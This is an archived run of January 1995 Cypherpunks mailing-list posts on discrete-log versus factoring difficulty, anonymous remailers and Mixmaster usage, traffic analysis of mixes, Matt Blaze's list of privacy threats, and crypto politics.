Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx9V8Tl0sXKgdnV5AQFg2gQAhEJ1wgf/XaqMOlVcvYfwgOeR2cKPPyQM
fitAJdXKkEXvTtUa3biByvVK86SLQmW/0cLME76UsmaMUY+FVncBoKwlRGKJnDci
6b7VtEW2ZkZKntUieTXFaVbSgI5XL/lIqQu2FFS6wuxH1KayxFeDLiTD6HWfa8t6
sedGrTb5f2I=
=Vjum
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Thu, 19 Jan 95 21:16:42 PST
To: mpd@netcom.com
Subject: Re: Factorisation and Discrete Logs
In-Reply-To: <199501190440.UAA28769@netcom5.netcom.com>
Message-ID: <9501200516.AA28512@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: mpd@netcom.com (Mike Duvos)
   Date: Wed, 18 Jan 1995 20:40:46 -0800 (PST)
   X-Mailer: ELM [version 2.4 PL23]
   Mime-Version: 1.0
   Content-Type: text/plain; charset=US-ASCII
   Content-Transfer-Encoding: 7bit
   Content-Length: 1017      
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   Derek Atkins <warlord@MIT.EDU> writes:

    > You are right...  Given talks Ive had with Brian LaMacchia,
    > who broke a version of "Secure SunRPC" (a 192-bit prime), he
    > claims that the difficulty is reducing a D-L problem is
    > about the same amount of computation to factorize an RSA
    > modulus of approximately the same size..

Just to clarify, the estimate I give people is that computing discrete
logs in a prime field GF(p) is about as hard as factoring a number 10
digits (33 bits) longer than p.  This estimate is based on the empirical
data Andrew Odlyzko and I collected for 192-bit and 224-bit moduli.  To
the best of my knowledge no one has attempted a discrete log modulus
larger than 224 bits.  (There just haven't been any juicy targets
recently to attack...)

   Although DH and RSA are believed to be of approximately equal
   difficulty given the same number of bits, DH is additionally
   vulnerable because system designers usually publish an "official"
   modulus and primitive root for everyone to use, whereas in RSA,
   everyone has their own key.

This is not a property of D-H key exchange, per se, but of the actual
uses to which people have put the D-H protocol.  Two parties wishing to
generate a shared secret could certainly produce a D-H modulus and
generator on the fly for one-time use, but that takes some time.  The
fact that the discrete log problem is brittle simply means that you have
to choose your modulus taking a few more things into account when using
the D-H protocol for a particular application.

   To mount an attack on PGP, for instance, you must factor a key
   for each person whose privacy you wish to compromise.  Breaking
   Sun's published 192 bit DH modulus instantly broke SunRPC on all
   machines using the protocol.  The latter was a lot less work than 
   the former.

Breaking SunRPC was a lot less work than breaking a (typical) PGP key
simply because the SunRPC modulus was so small.  If I'm given a choice
of factoring 100 different 512-bit PGP keys (for 100 different users) or
breaking a 768-bit D-H modulus that compromises all 100 users
simultaneously, I'll take the factoring problems.

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Thu, 19 Jan 95 23:41:18 PST
To: xpat@vm1.spcs.umn.edu
Subject: Re: Remailer-on-a-CD
In-Reply-To: <9501191924.AA17670@toad.com>
Message-ID: <m0rVDxj-0004IuC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> >The "Linux mavens" followed by the "black box" stuff sparked an idea...
> 
> >package.  To make it as easy as possible, I'd use the UMSDOS filesystem so
> >that Linux could be installed on a DOS machine without any reformatting
> >repartitioning, or similar headaches.
> 
> >distribution already has) and some boot options, you'd have an "instant
> >remailer" software package, able to transform any 386SX/4MB RAM DOS macine
> >or better into a Linux-based remailer site, complete with aliases, loggng

If you look out on ftp.netcom.com:/pub/ec/ecarp/linux*, you'll find a bare-
bones Linux set that will install right in a DOS filesystem (it's a .ZIP file).
It's intended for SLIP clients, but it could easily be adapted for setting
up an "instant remailer".
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 19 Jan 95 22:21:55 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Julf operates anon.penet.fi
In-Reply-To: <Pine.3.89.9501192004.A20171-0100000@vern.bga.com>
Message-ID: <199501200623.BAA25299@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Nathan writes:
> sez it all

likewise





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Angus Patterson <s675570@aix1.uottawa.ca>
Date: Thu, 19 Jan 95 23:15:34 PST
To: blancw@pylon.com
Subject: Re: T.A.Z. on Disk
In-Reply-To: <199501200446.UAA04577@deepthought.pylon.com>
Message-ID: <Pine.3.89.9501200130.A35161-0100000@aix1.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain



The book "Temporary Autonomous Zone" is available online at wiretap.spies.com
The most recent issue of Mondo 2000 talks about the CD with Hakim Bey and
the producer.

I also saw another e-book site that had some more of his stuff, can't 
remember what it was though.
Of course, one could always just buy them on paper (remember that?)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david.lloyd-jones@canrem.com (David Lloyd-Jones)
Date: Fri, 20 Jan 95 00:36:44 PST
To: cypherpunks@toad.com
Subject: RE: ELECTRONIC CASH ILLEG
Message-ID: <60.19099.6525.0C1CA93D@canrem.com>
MIME-Version: 1.0
Content-Type: text/plain


 Thomas Grant Edwards <tedwards@src.umd.edu> writes:
 
TS+Actually, the "backing" of a fiat currency is the need to have some 
  +around to pay your taxes, else you go to jail.  You are taxed on many 
  +types of income, even if they are not directly exchanged in the fiat 
  +currency.  Somehow you have to get some.

This is pretty much true, but does not logically justify your 
conclusion:

TS+This also means that higher taxes can make the currency more 
  >desirable, 
  +lower taxes less, higher government spending less, lower government 
  +spending more, etc.
  
This is only somewhat true.

The most important factor is that currencies are traded on a fairly 
free market.  This means supply and demand, not any firm intrinsic 
qualities of anything, dominate.  If a country is running a positive 
net balance, whether by trade, capital investment, or influx of rich 
refugees, there will be a demand for its funnypaper, and that 
paper's price, in other currencies will rise.  

The same will apply to currencies not attached to countries -- such as 
the NetCredit, which I am working to put into reticulation.  That's 
electronic for "circulation".  :-)
 
The hardest currencies, roughly in order, are those of Switzerland, 
Taiwan, and Japan.  Germany is no longer on the list because Kohl 
bought the second last election in the most expensive bit of bribery in 
the history of democratic politics: the couple of trillion dollars he 
spent by assigning par value to the OstMark.  Hong Kong is not on the 
list because of the huge outflows for the development of China, which 
tends to balance supply and demand at a lower/softer level than it 
would otherwise have.  The US is no longer on the list because Reagan 
booted the whole thing into the can.
 
                        Best,
 
                            -dlj.
 
 

 
                                     -dlj.

david.lloyd-jones@canrem.com

 * 1st 1.11 #3818 * Who won't do the arithmetic will live by stupid policies.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Fri, 20 Jan 95 00:34:57 PST
To: cypherpunks@toad.com
Subject: Re: Threats in real life - what are we worried about?
Message-ID: <9501200836.AA19977@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:
>	
>	Given existing crypto tools (PGP, etc), what are the top ten
>	practical attacks against the privacy of stored data and
>	electronic mail?  Who are the bad guys? What tools do we need
>	to limit these threats?
>
>I'll post my own thoughts later.
>


Matt's Top Ten Underappreciated Threats to Privacy on the Internet
==================================================================

1.  The sorry state of software.  Everyone knows that nobody knows how
to write software.  Modern systems give hundreds of thousands of lines
of code the chance to violate security policy.  How can we be sure
that the software we trust does the right thing?  How can we reduce
the opportunities for problems?

2.  Ineffective protection against denial of service attacks.  While
not a direct threat to privacy, the ease with which almost anyone can
mount effective denial of service attacks threatens the ability to
deploy anonymous services.  You'll note that no one worries very much
about the millions of anonymous entry points to more robust networks
like the telephone system or the postal service, where it's relatively
hard (and expensive) for an individual to cause large-scale service
disruption.  How can we make the 'net robust enough to withstand
mailbombs and newsgroup spamming?

3.  Poor secret storage on networked computers.  Cryptosystems allow
you to manage large secrets by protecting smaller ones (keys).
Unfortunately, modern computers are awful at protecting even the
smallest secrets.  Multi-user networked workstations can be broken
into and their memories compromised.  Standalone, single-user
machines can be stolen or compromised through viruses that leak
secrets asynchronously.  What are the right mechanisms for storing
and managing keys on various platforms?  Remote servers, where there
may be no user available to enter a passphrase (but see threat #5,
below), are an especially hard problem.

4.  Poorly understood random number generation techniques.  Keys and
session variables need good sources of unpredictable bits.  Currently
used techniques (like event inter-arrival times) are only marginally
well understood and depend to a great deal on low-level
characteristics of the platforms on which they are run.  We need a
wider range of techniques (especially ones that work without relying
on user input), and to better understand their risks and failure
modes.  Some interesting ideas have been proposed that deserve further
study.  At CRYPTO '94 there was an interesting paper on using disk
airflow variation to get random bits.  Another interesting technique,
first proposed by Don Mitchell, involves exploiting clock skew.  Here's
a C program that seems to produce one pretty random bit per second on
most platforms.  How good are the bits?  Can we get more bandwidth out
of it?

#include <stdio.h>
#include <signal.h>
int count=0;
void printbit()
{
	signal(SIGALRM,printbit);
	alarm(1);
	printf("%1d",count&01);
	fflush(stdout);
}
main()
{
	signal(SIGALRM,printbit);
	alarm(1);
	while (1)
		count++;
}

5.  Weak passphrases.  Most crypto software addresses the key storage
and key generation problems by relying on user-generated passphrase
strings, which are presumed to contain enough entropy to produce good
key material and are also easy enough to remember that they do not
require secure storage.  While dictionary attacks are a well known
problem with short passwords, much less is known about lines of attack
against user- selected passphrase-based keys.  Shannon tells us that
English text has just over 1 bit of entropy per character, which would
seem to leave most passphrases well within reach of brute-force
search.  Less is known, however, about good techniques for enumerating
passphrases in order to exploit low entropy.  Until we have a better
understanding of how to attack passphrases, we really have no idea how
weak or strong they are.

6.  Limited support for remote trusted agents.  Almost all currently
available cryptographic software assumes that the user is in direct
control over the systems on which they run and has a secure path to
it.  For example, the interfaces to programs like PGP and CFS assume
that their input is comes from the user over a secure path like the
local console.  This is not always the case, of course; consider the
problem of reading your mail remotely when logged in over the
Internet.  We need better mechanisms for transferring the trusted
operations to the local trusted machine while keeping the logical
operations (like where the mail is) where they logically belong.

7.  Poorly understood protocol and service interactions.  Features
frequently come back to bite us, and its hard to know even where to
look.  The Internet worm was propagated via an obscure and
innocent-looking feature in sendmail; how many more features in how
many more programs have unexpected consequences just waiting to be
discovered?  Is the conventional wisdom of hiding behind firewalls
and turning off services really the only answer?

8.  Lack of scalable security infrastructure.  No comment...

9.  Poorly understood "out of band" attack risks.  Security people
tend to focus on what's easy to model.  Unfortunately, attackers focus
on what's easy to exploit.  We need a better understanding of just how
easy some non-traditional attacks are.  Most of the answers are
probably too scary to think about.  How long do our keys need to be in
the face of electromagnetic radiation, physical monitoring, Trojan
horses, social engineering, and so on and so on?

10. No broad-based demand for security.  This is a well-known problem
among almost everyone who has tied his or her fortune to selling
security products and services.  Until there is widespread demand for
transparent security, the tools and infrastructure needed to support
it will be expensive and inaccessible to many applications.  This is
partly a problem of understanding the threats and risks in real
applications, and of building systems that include security as a basic
feature rather than as a later "add on".

There's a lot missing from this list, and a lot you can disagree with
among the things that are on it.

Flame away...

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Fri, 20 Jan 95 00:53:20 PST
To: cypherpunks@toad.com
Subject: Remailer Software Sites/Comparison
Message-ID: <199501200858.DAA05727@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Wei Dai writes:
> Can anyone give an overview of the remailer packages that are currently
> available?  What features and differences do they have, and where to get
> them?

Raph Levien's Remailers WWW page has links to most of the material on
the remailer software of which I'm aware:
http://http.cs.berkeley.edu/~raph/remailer-list.html

The remailer-help file from mixmaster@nately.ucsd.edu gives an ftp directory
from which one may ultimately obtain Lance Cottrell's Mixmaster code, after
following an export control process which I assume resembles MIT's method of
distributing PGP. Lance sent out a first draft of instructions on the
mixing (including packet splitting & recombination) features of Mixmaster to
the list a few months ago, which I enclose below. Mixmaster is the latest
and most sophisticated of the remailer packages I've seen, so I'd
recommend it to anyone looking to install a new remailer in North America.

- -L. Futplex McCarthy

===== forwarded message follows ===============

Date: Sun, 20 Nov 1994 17:07:02 -0800
To: cypherpunks@toad.com, remailer-operators@c2.org
Subject: 1st Draft Mixmaster chaining instructions
Sender: owner-cypherpunks@toad.com
Precedence: bulk
X-Status:

[...]

Here is the first draft of the instructions for using Mixmaster to
build remailer messages. I am posting it to give a flavor of what the
program does, and to request comments, both on the features and on
the clarity of the help file itself.

Instructions for using Mixmaster to create type 2 remailer messages.

I assume that you have either compiled Mixmaster, or that you have acquired
a precompiled copy.

While you do not need PGP to use Mixmaster, it is useful for key
management, and is required if you desire security of the content of the
message you are sending (which will be visible to the last remailer).


Theory and purpose of remailers:

The purpose of anonymous remailers (hereafter simply remailers), is to
provide protection against traffic analysis. Traffic analysis is the study
of who you are communicating with, when, and how often. This reveals more
than you might expect about your activities. It will indicate who your
friends and colleagues are (and they can be told apart by looking at the
times you contact them). What your interests are, from which catalog
companies you contact, and which ftp and WWW sites you visit. Traffic
analysis can even reveal business secrets, e.g. your frequent contact with
a rival could give hints of an impending merger.

Remailers protect your email from traffic analysis. The original remailers
did this by removing all headers, except the subject line, from any message
you sent to them and then forwarding them a destination of your choice. The
recipient of such a message would not know who had sent it.

The addition of encryption to this scheme gave significant protection from
attackers who simply look at passing messages for to and from fields.
Passing a message through several remailers in a row is much better, but
still vulnerable to an attacker who can watch messages go into and out of
each remailer.

Two more elements are required: messages must be reordered within the
remailer before being forwarded (this is being done by a few of the old
style remailers), and all messages must be indistinguishable. This last is
the primary improvement with the type 2 remailer, Mixmaster.


Using type 2 remailers:

The trend towards ever more complicated remailer message formats has been
clear for some time. Several programs have been written to automatically
build messages which will be remailed by several remailers. This process is
called chaining.
With type 2 remailers it is no longer possible to create these messages by
hand. Mixmaster takes a message you wish to send, a list of remailers to
chain it through, and a final destination, and builds the packet which the
remailers will use. For simplicity I will first describe the interactive
use of Mixmaster, then I will discuss how it can be controlled through
command line arguments.


Interactive use of Mixmaster:

If you run Mixmaster with no arguments, you will be prompted for all the
required information.

First you will be asked to specify the final destination of the message.
This is the full email address where you want your message delivered.
Remember that the message is being sent by the last remailer in the chain,
so you must specify the full internet address (e.g.
name@machine.place.com), you may not use local mail aliases. You may enter
multiple recipients on separate lines. Hit return on a blank line to stop
entering destinations. You must have at least one.

Next you will be asked to enter any headers you want to have inserted
before the message. These are those lines  at the beginning of email
messages, like From: fred@bedrock.univ.edu, or Subject: Party invitation.
If you want your message to have a subject when it is delivered, you must
enter a line
Subject: your subject here.
Note that Subject must be capitalized, with the : and space as shown.
A subject header can be added by using the -s command line argument.
When you are done entering headers, hit return (it is OK to have zero headers).

You will now be presented with a list of  remailers through which you can
chain your messages. The order in which you choose them is the order in
which they will be traversed by your message. You may choose up to 20 of
them, but remember that the reliability and speed of the chain diminish as
the number of remailers in the chain increases. Four is a reasonable number
of remailers to use. It is fine to use a given remailer more than once in
your chain. Press return on a blank line to stop entering remailers.

Finally you will be asked what file you want to send. This must be an ASCII
file. You may either enter the name of an existing file, or you may choose
to enter the message directly by typing "stdin" as the file name. This is
intended for use by scripts. There are no editing capabilities when using
stdin. Enter the end of file character (EOF is ^D) when you are done
entering the file.

Mixmaster will now build the type 2 remailer packet, and send it to the
first remailer in the chain.


Command line arguments to Mixmaster:

Mixmaster [-c] [in.filename] [-f] [-s "subject"] [-o "outfile"] [-to
a@b.com] [-l 3 2 6 ...]

 -c      this indicates that chaining rather than remailer functions are
desired. It is a NOP since chaining is the default operation.

"filename"      if a filename is given, then this will be used as the input
file. As in the interactive mode, you may choose "stdin". No filename will
be prompted for.

 -f      filter mode. All prompts suppressed, but input still accepted as
described in the interactive section. The remailer list must be specified
on the command line.

 -s "subject"    Adds a subject line to the message. The user should NOT
include Subject: in this string. Mixmaster will not prompt for other
headers if -s is used.

 -o "outfile"    Specify an output file rather than sending the message to
the first remailer automatically. If outfile is "stdout", then the remailer
packet will be printed to stdout.

 -to foo@bar.org specifies the final destination of the message. Only one
destination can be specified. Mixmaster will not prompt for other
destinations if -to is used.

 -l 4 3 5 ...    Specifies the list of remailers to chain through. This must
be the last argument on the command line. A maximum of 20 remailers may be
specified. Mixmaster will not prompt for other remailers if -l is used.


- --------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
[...]
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLx97BioZzwIn1bdtAQEMvQF/RlnlugSboXC/+LtZoyfVm4Blc4/do0re
59XYOo7Vs/AQRWLZU4iM8h65axpr7G3f
=VW+M
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnston" <caj@tower.stc.housing.washington.edu>
Date: Fri, 20 Jan 95 04:09:42 PST
To: cypherpunks@toad.com
Subject: remailer questions
Message-ID: <199501201209.EAA01188@tower.stc.housing.washington.edu>
MIME-Version: 1.0
Content-Type: text



Ok, I'm planning on putting up a remailer on my Linux box.   

One of the things I'd really like to know is, how much in the way of
attempts to break into your machines are remailer ops seeing?  

How much in the way of other attacks?

I'd also like to get some idea of the amt of resources consumed by
a relatively popular remailer -- amt of system loading, disk space
devoted to remailing activites, and anything else.  

I know loading will be hard to quantify in a meaningful way, but for
reference my machine is a 486/66 w/32 megs RAM and pretty fast SCSI
disks.  Just a general idea of how significant the load on such
a machine will be would be nice.  My SCSI and Ethernet are both fast,
and on a PCI bus.

My site is at the moment, I think, relatively secure.  I have few users
and am sure at the moment nobody has an easily crackable password.  I
plant to install a fascist password checker soon.  

I currently have ftpd and fingerd commented out of my inetd.conf.
(I plan to put ftpd back, at some point, but really don't like outsiders
being able do a finger @site and find out who is on, how long, how long
idle, find out when users last logged on or read their mail, etc.  I will
probably want to add it back after modifying it or finding a stock one
that does what I want.)  

I have tcp wrappers installed, and have checked on a number of blatant
security holes that I know of.

I am worried that once I begin running a remailer, the number of attacks
on my machine will increase dramatically.  I'd of course like for my
data and my users' data to remain private, and believe that a compromised
remailer is (obviously) worse than no remailer at all.

What would be nice, before I put up a remailer, would be to have any
willing, security-knowledgeable cypherpunk subscribers out there to
probe my machine for any really obvious chinks, for security-aware
Linux users to point out any Linux or Slackware-specific security
holes, etc.  Of course I'd want to have a word with anyone willing
to probe me before they just went at it... ;)

Linux kernel is currently 1.1.81, which is quite stable for me, 
and the Slackware distribution is 1.2.0.  

I'm running sendmail 8.6.9, are there any really terrible vulnerabilities
in it any longer from outside the machine?  From inside?

Of course, I'm on an Ethernet with others, and have users logging in
from other Ethernets, so am vulnerable to sniffers.  I don't
think it's going to be feasible to install skey here, as a number
of my users are extremely non-technical.

I'm also still looking around for what I'm going to run.
I'd like for it to be easy to reply to users, but absolutely 
impossible for me to 'out' anyone under any circumstances.  The 
encrypted-sender stuff some remailers currently use is probably too
ugly for most average joes to want to use, and not as secure as I'd
like.  It's probably the best available at the moment.  This should
definitely change.

What I'd *really* like to do would be to write a client and server
to make an anonymous pool act like normal email ... this is really 
the only way I can think of to make replying easy but also to have
good security.  I'm sort of surprised someone has not done this yet.
It'd be pseudonymous, your client would only look at messages for
you or for everyone (for your convenience -- of course anyone could
look at anything, but it'll all be PGP'ed, so...)  Some really 
neat things that could be done w/this... for folks willing to 
trust the sever to some degree, cross-referencing of pseudonyms
and public keys could be done, allowing joe user to just mail to
a pseudonym -- this would be good in cases where one party wishes to
hide, while the other has nothing to hide and is possibly very
non-technical.  He'd have no guarantee that someone wasn't reading
his mail to the pseudonymous party, on the way in, but the p.n. party
would not have to worry about having his real address cross-referenced,
or about the server having the key to decrypt his real (included) address
in memory or on disk.  

Anon pools are obviously doable right now, with a mailing list, but
the inconvenience of using one like this is a real barrier.

An anonymous pool;  Usenet-like -- distributed over many machines in
many countries, but with pseudonyms instead of "real names" and
public keys as addresses.  This is definitely doable, right now.
NNTP-type servers doing news and mail service.  As the scale got
larger, we'd of course not want to send everyone's mail to all
the servers, but tying a user down only as far as to a given server
would probably not be a problem -- look at all the different folks that
may use one NNTP server.  Perhaps mail for a given user could be sent
to several different servers to keep things muddy.

Mixmaster does not currently run on Linux, is that correct?  
Anyone know what the problem is, or have an idea what amt of work 
would be involved in porting it?  I'd like to look at this.

Really, though, everything out there is pretty unsatisfactory --
only anonymous pools and DC-nets have the characteristics I'm
interested in.  Anyone on the list doing any serious work on 
DC-nets?  I find these extremely exciting, and don't see much
brainstoming on implementation going on.


regards,
Craig.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnston" <caj@tower.stc.housing.washington.edu>
Date: Fri, 20 Jan 95 04:29:02 PST
To: cypherpunks@toad.com
Subject: Re: remailer questions
In-Reply-To: <199501201209.EAA01188@tower.stc.housing.washington.edu>
Message-ID: <199501201228.EAA01257@tower.stc.housing.washington.edu>
MIME-Version: 1.0
Content-Type: text


> 
> Linux kernel is currently 1.1.81, which is quite stable for me, 
> and the Slackware distribution is 1.2.0.  

Errata: make that 2.1.0


-Craig



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 20 Jan 95 08:24:38 PST
To: cypherpunks@toad.com
Subject: Re:  traffic analyzing Chaum's digital mix
Message-ID: <199501201624.IAA13926@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Wei Dai <weidai@eskimo.com>
> I have been thinking about the problem of traffic analysis of a 
> remailer.
> [...]
> The basic approach is to use this raw traffic information to calculate a 
> SCORE for each user of the remailer with respect to Alice, where the 
> user with the highest SCORE is the person Alice is most probably 
> communicating with.  The idea is that with a Chaumian mix, every time 
> Alice sends a message to Bob there is always a pattern of Alice sending 
> a message to the mix, followed by Bob receiving a message from the mix 
> during the next batch.  By counting the number of such correlations for 
> each user over a period of time, and taking into account the fact that 
> users who receive more messages from the mix will have higher numbers
> of coincidental correlations, a SCORE can be calculated so that it would 
> be a good indication over the long run of the probability that a particular 
> user is communicating with Alice.

This sounds like a good idea.  It was very interesting to see your
earlier result on the impact of dummy messages on this approach.  Even a
relatively small number of batches without dummy messages allows
continual accumulation of incriminating information.

I know that the Eurocrypt 89 proceedings had some articles on
cryptanalyzing Chaum's mixes.  My library has an excellent crypto
selection but is missing this volume.  Can anyone who has read this say
whether there is anything in those papers that isn't obvious?

Another interesting aspect of your analysis is the possible role of
latency.  Earlier I had thought of latency as primarily a way of doing
mixing, an alternative or addition to batching which mixes messages
without holding them up quite as much.  But in terms of this in/out
analysis latency could play a part in blurring the batch boundaries,
adding more uncertainty and making the job of the analyst harder so he
would need more data to establish his scores.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLx/jixnMLJtOy9MBAQGFzwH/diYW0NSddacKyXGvsBc53FsR47R+4BSS
pVprHz2LfpVl7U2FFAePMjZIGr5w24hA6nxn1brAO9v6JkVzgUabvA==
=Vehs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Angus Patterson <s675570@aix1.uottawa.ca>
Date: Fri, 20 Jan 95 05:28:37 PST
To: Charles Bell <quester@eskimo.com>
Subject: Re: T.A.Z. on Disk
In-Reply-To: <Pine.SUN.3.91.950120001338.7806B-100000@eskimo.com>
Message-ID: <Pine.3.89.9501200807.A22183-0100000@aix1.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 20 Jan 1995, Charles Bell wrote:

> > 
> > The book "Temporary Autonomous Zone" is available online at 
wiretap.spies.com
> 
> Available how, exactly?
Sorry about that.
The hazards of being brief, I guess (never post when you're half asleep). 
Gopher and ftp work for the same address on this one.  
/Library/Documents/taz.txt is good for ftp, or try the   
/Electronic Books at Wiretap     heading on the first menu, if you use 
gopher. The pointers to the other etext sites might lead you to his other
stuff (there were two others as far as I can remember). 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Fri, 20 Jan 95 06:22:45 PST
To: cypherpunks@toad.com
Subject: Crypto Anarchy/Libertarians in WSJ
Message-ID: <199501201418.AA10378@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Today's WSJ

Front Page

Left Column

Less Is More

Libertarian Impulses
Show Growing Appeal
Among the Disaffected

When the Government Fails
    Many Voters are Asking:
    Who Needs it Anyway?

Mixed Blessing to the GOP



"Mr. Frezza...doesn't just want to cut government: He questions the very
need for most of it.  He figures that in a world in which computer wizards
are close to creating their own private, encrypted digital cash system for
making transactions without any government involvement, the need for
centralized authority is shrivling."


DCF

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx/FiIVO4r4sgSPhAQEhmgP/dxCXAPS6iu/Zb9P7AuC6D8aDg94vZABs
VjlXXXXWjkHedveIjQ9qdU8xELblzZiMlu35SKKygLvsD2a8bNXiC2FxBnA/H716
Dj4UHksctV3wJSZuwq6z8/fZds0Dg5GJLYbAUrbdInp/tM7TMrAhUVLFVkVpzhzk
25aXzmIiv5U=
=4FOR
-----END PGP SIGNATURE-----
*************************************************************************
ATMs, Contracting Out,  Digital Switching, Downsizing, EDI, Fax, Fedex,
Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone 
Cards, Quants, Securitization, Temping, Voice Mail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Fri, 20 Jan 95 07:22:13 PST
To: hfinney@shell.portal.com (Hal)
Subject: Re: EE Times on PRZ
In-Reply-To: <199501180556.VAA25844@jobe.shell.portal.com>
Message-ID: <199501201520.AA03483@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hal wrote about the PRZ case:

> (Sometimes it seems like the gov't is dragging this case out
> intentionally.  I believe the uncertainty does have a chilling effect on
> private development of strong crypto, which would be gone if the
> government announced it was not going to pursue the case, or if they did
> bring charges and lost.)

I've been slogging through a book on Dr. Gerald Bull, the semi-notorious
gun designer who was assassinated by parties unknown in the midst of
helping the Iraqis build several superguns.

In the late '70s, Bull was prosecuted and spent 4 months at the
Allentown pen for ITAR violations.  His company exported "technical
data," shell blanks, and various equipment useful for designing &
building howitzers to South Africa. The prosecuting US Attorney took
more than two years from original indictment to the actual trial. It
seems that the same mechanism is at work here.

Incidentally, Bull had at least made some effort to check with the
Office of Munitions Control about the legality of his exports; a
letter he received from them seemed to say that his planned exports
were legal.  The judge citec OMC's screwup as a factor affecting the
length of sentence.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the 
perobich@ingr.com            | amount of work you put into a product; it just 
Not speaking for Intergraph. | redistributes it differently.
                  ### http://www.intergraph.com ###

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx/UqKfb4pLe9tolAQHCxAP+OqnmoK/Eri0mNPnd3voMP+8YfpszVwFl
pCPntLHhL9TRYckhM+o504pJeBj2STc+aaIT5PTnCjd6aniGJy2QYgqYxALExbw9
EaM7fQXlwCqSS2u04/UzGmkmjgWqtUdAacu+C2gj+N61Aaay0ReR+DJBtP7rLypi
w3l74NhHFDA=
=fRtk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com (David Mandl)
Date: Fri, 20 Jan 95 06:28:01 PST
To: cypherpunks@toad.com
Subject: Re: T.A.Z. on Disk
Message-ID: <9501201422.AA11305@yeti.bsnet>
MIME-Version: 1.0
Content-Type: text/plain


There's a Hakim Bey web site with the full text of TAZ and a bunch of
other things, including the pamphlet "Radio Sermonettes" and various
other essays.  I've got the URL at home, so I can post it to the list
tonight (sorry, but it's easier than asking people to email me for it
individually).  The text, at that site at least, is the absolutely
authorized original (from our original files).  I've got other odds
and ends by H.B. that have never been made available on the net which
I may or may not get around to posting in the next few weeks.

The followup to TAZ (the book), which will probably be called "The
No-Go Zone," will be out in about six months.  Well, maybe nine...

   --Dave.


> From: Angus Patterson <s675570@aix1.uottawa.ca>
> 
> On Fri, 20 Jan 1995, Charles Bell wrote:
> 
> > > 
> > > The book "Temporary Autonomous Zone" is available online at 
> wiretap.spies.com
> > 
> > Available how, exactly?
> Sorry about that.
> The hazards of being brief, I guess (never post when you're half asleep). 
> Gopher and ftp work for the same address on this one.  
> /Library/Documents/taz.txt is good for ftp, or try the   
> /Electronic Books at Wiretap     heading on the first menu, if you use 
> gopher. The pointers to the other etext sites might lead you to his other
> stuff (there were two others as far as I can remember). 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com (David Mandl)
Date: Fri, 20 Jan 95 06:27:56 PST
To: cypherpunks@toad.com
Subject: Re: T.A.Z. on Disk
Message-ID: <9501201424.AA11493@yeti.bsnet>
MIME-Version: 1.0
Content-Type: text/plain


> From: blancw@pylon.com
> 
> *T.A.Z. = The Autonomous Zone

T.A.Z. = Temporary Autonomous Zone

   --Dave.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
